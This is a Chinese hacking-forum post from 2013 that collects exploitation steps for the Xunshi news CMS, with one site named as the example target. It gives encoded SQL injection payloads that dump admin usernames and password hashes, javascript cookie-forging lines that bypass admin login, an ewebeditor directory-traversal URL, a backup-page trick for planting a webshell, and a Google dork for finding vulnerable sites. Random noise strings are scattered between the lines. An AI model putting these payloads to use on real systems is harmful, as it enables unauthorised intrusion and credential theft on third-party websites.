中国网络渗透测试联盟
标题:
讯时漏洞总结
[打印本页]
作者:
admin
时间:
2013-1-16 21:25
标题:
讯时漏洞总结
by:血封忆尘
. m/ R# k4 v0 X! J
1 S4 Z9 Y' Q3 h5 ^1 ~$ q0 S
在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)
( e' S6 G; E( P2 r, s( i
; _6 }/ V0 H/ @, |6 }7 Z! |
以下本文总结来自黑防去年第9期杂志上的内容...
6 y D' C9 H) l( `6 v& \
8 R& c5 F- |5 t4 k* X
先说一个注入吧:
http://www.political-security.com/news_more.asp?lm=2
%41nd 1=2 union %53elect 1,2,3,0x3b%
5 @( X# k' z; }, O5 F% }6 v) F
; z- T( a% d, S( b" W$ |
26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
3 G! \2 B& o. Y
$ n Q. w# y. u5 }9 V7 k9 W$ ^- _
记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况
- @: Y) ^) z% z; H( I; A v4 ]
这里一个注入
' l4 @' i% A! f4 M8 x$ i- x$ |+ i
$ l: z) p Z8 C
效果如图:
* |! J6 C# g+ F, m0 ^, _4 V9 j
3 y" a1 n$ U. V
+ ]$ i9 z, L: k; s+ T0 F% g- n
n! _3 a3 I1 r- V6 \$ S( {
这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.
6 Z4 R. e a' |- I; u
, _; A* @. s( O! P! f0 L$ R
密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去
( l$ P3 j& w1 y/ o7 a, g
$ ?4 m1 `' P. y+ O# {% C! `8 R
javascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));
7 w, t+ o. W5 d# c& u
. N& c: ~( i; u: j
那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:
: g" A; y- z& R
5 ~2 ~9 C. _2 L4 k' n: f% z3 E( A
因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞
6 q$ d$ Q, c* h0 p" ~7 T0 q* D6 @6 ^" v
( Q% i7 y1 f, Y# x
它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以
; S! s1 |4 s+ T0 j
) n6 e. Y& G' B+ ?5 _9 R2 d( D; B
访问这页面来列目录..步骤如下:
& h c1 @8 w l, _, S8 X& s; t
, H2 u" \' ^$ C5 H$ _. M- L5 Z
javascript:alert(document.cookie="admindj=1")
B* c/ _+ w+ F
7 Q0 t, p' T0 t$ b4 C
http://www.political-security.co ... asp?id=46&dir=../..
. v2 A- J6 k2 ?1 J% F2 D
7 ~3 b/ n6 h" s+ ?, b
效果如图:
4 C! l) D# f, U/ A* ]3 k5 U# \1 r
6 X8 A5 s6 C) |( I0 g9 S
4 p: b' X& V* Q" ^/ Z& F& C: L
8 T9 N U1 {7 n
这样全站目录都能瞧了..找到后台目录..进去..
) y- m$ }$ u/ O' P G+ K. N0 }0 v
0 S+ R8 ]. g4 k4 l- O7 Y: U
那么进了后台怎么拿shell??上传--备份就ok了..
0 n! @' D+ F1 S' s& T( s ]
" I5 V5 E1 a* g" c4 Y: p
那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..
8 C8 ]- g& v/ n; ]8 |# J; ]1 P
5 w* [7 r5 {4 h' r, V
这个我也碰到过一次..你都可以通过列目录来实现..
$ O/ Q" \& g/ ~+ T5 f5 E
0 n: a' z9 C+ S. z+ h, n
javascript:alert(document.cookie="admindj=1")
) h& L! o ?+ }( O/ O1 N
- s& o7 G( V2 ~
http://www.political-security.co ... p?action=BackupData
1 C, K* y: e+ \+ n. ^' ~
' ^5 l" P7 p6 D N
备份ok..
8 M5 H; `+ P! @
6 u7 H& V, L7 {7 z- ]
那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?
. h0 x3 k. d! E
) V2 B* n: T" O. O( k3 B
在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下
5 p4 d! P) B: I4 f
. e( l- m9 Z, C) q5 l. {
然后访问此页面进行注入..步骤如下:
8 u# W, I$ v+ O. X! l
2 r `) B3 F0 M
javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")
' ?+ M5 Q& I$ z7 y( W2 P
8 [5 t; f# v1 l# m5 N$ Y; F" `
然后请求admin/admin_chk.asp页面
* R1 T' U3 Q5 E& h9 |
/ k4 Y/ C3 T3 e4 ~" m' v7 d
输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%
: W% {* T; u; k/ _& a
8 k, F3 X$ l0 G. G) x. @
26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
( b' d2 Z( B. G% H0 L5 X
$ Q5 Z! q- H) g) Y) k
效果如图所示:
4 u- E, i& e+ k+ `
# j2 b, U: I7 i# j$ D1 g, J
- G! Q1 T# N: D5 T c4 s
5 w+ z$ p$ L1 s0 @# g4 v; S& m
讯时漏洞2
7 c* L" C& D) u1 z i
google关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)
7 {) f* c4 Y+ R, [/ U% r
6 ^( y$ Z$ U6 C- {: ~
1、/admin/admin_news_pl_view.asp?id=1
) P7 V& f& J7 R$ j! b
//id任意 填入以下语句
# F: X6 n* B# J4 ?2 b! A( t
" e# W* } @: G8 E' p
2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!
9 V0 }5 G8 ~0 O7 w# l! W
# Q+ O, H" L4 m+ K+ Z
* x8 E/ ]& y. F2 m+ F) W
8 y0 `: S8 \7 [! f, r/ R7 o
3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='
+ G- S& v2 R% b3 c+ \* Z1 A" c- R
! M- y; W+ _& ^: f/ X$ z6 y, Z. A
+ ], g0 m# d* \+ `& d
( l- Q& ]4 I9 a* A1 c! i- n* O
爆出管理员帐号和密码了
" ~3 H v9 R5 y% M* |7 @
+ O/ K: J* ~' |) T) L8 V5 z
w3 `6 R0 o% W; J+ B
# _; B/ ^) [# T. K6 m8 T
4、cookies进后台
: {( b, J6 y; r, x
D0 u- B4 [- Y2 U
javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));
, u4 [+ o; {8 }& ^0 k7 a
J% W i% d& X0 E# v" ?3 P+ ]
% e$ I6 o* t# z1 u" i- f4 J- s6 ]
- |( t! y8 ^. o0 G y, u
5、后台用了cookie验证,直接访问
http://www.political-security.com/admin/admin_index.asp
就OK了!
# W V; Y: Q V" T' s* D6 T6 P
/ u. a+ N: D) m" o# [
: e. S0 w" V% _8 Y* w7 o& j/ w8 F
: q7 @# Q5 Z; F K1 }
6、后台有上传和备份取SHELL不难。
, f M2 T% s+ B! r. ?3 a \2 t2 u
2 a2 I% H2 z. t# i+ t* U
7、讯时还有个列目录漏洞:
http://www.political-security.co ... asp?id=46&dir=../..
+ @0 z" j$ k& |/ p
, g& |2 T# \9 }+ M# R z
逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问
http://www.political-security.com
/admin/admin_db_backup.asp?action=BackupData
,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!
9 B0 l) ]2 X0 c( D- A, r6 p; R
+ x8 k( b% l# c
8 a' H/ z* R' B; a2 u
4 r& z; Z. d' L8 a* f; ]2 G
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2